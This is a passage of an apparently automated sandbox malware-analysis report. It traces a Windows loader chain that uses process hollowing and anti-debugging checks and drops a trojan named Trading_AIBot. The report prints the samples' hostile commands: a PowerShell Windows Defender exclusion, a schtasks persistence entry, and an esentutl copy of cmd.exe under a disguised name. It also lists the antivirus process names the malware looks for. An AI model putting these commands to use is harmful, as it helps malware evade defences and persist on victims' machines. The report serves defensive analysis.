                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                      Source: x.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
                      Source: Native_neworigin.exe, 00000009.00000002.2403789034.0000000005176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0h
                      Source: x.exe, 00000002.00000002.2165746672.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2165746672.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2403789034.0000000005176000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000009.00000002.2397017499.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Juqmtmya.PIF, 00000010.00000002.2330828270.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_2-32614
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeAPI call chain: ExitProcess graph end nodegraph_9-50134
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,2_2_02DCF744
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,9_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DC894C LoadLibraryW,GetProcAddress,FreeLibrary,2_2_02DC894C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00821130 mov eax, dword ptr fs:[00000030h]9_2_00821130
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00863F3D mov eax, dword ptr fs:[00000030h]9_2_00863F3D
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0040ADB0 GetProcessHeap,HeapFree,9_2_0040ADB0
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifCode function: 8_1_004015D7 SetUnhandledExceptionFilter,8_1_004015D7
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifCode function: 8_1_004015D7 SetUnhandledExceptionFilter,8_1_004015D7
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040E61C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00416F6A
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_004123F1 SetUnhandledExceptionFilter,9_2_004123F1
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00861361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00861361
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00864C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00864C7B
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Benign windows process drops PE files
                      Source: C:\Windows\System32\wscript.exeFile created: x.exe.0.drJump to dropped file
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Allocates memory in foreign processes
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Sample uses process hollowing technique
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Writes to foreign memory regions
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 2A4008Jump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 356008
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 244008
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00848550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,9_2_00848550
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_02DB5ACC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,2_2_02DBA7C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_02DB5BD8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,2_2_02DBA810
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: GetLocaleInfoA,9_2_00417A20
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB920C GetLocalTime,2_2_02DB920C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 9_2_00848550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,9_2_00848550
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DBB78C GetVersionExA,2_2_02DBB78C
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: x.exe, 00000002.00000003.2122855279.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2123814869.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2122855279.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2371298142.000000007EF46000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
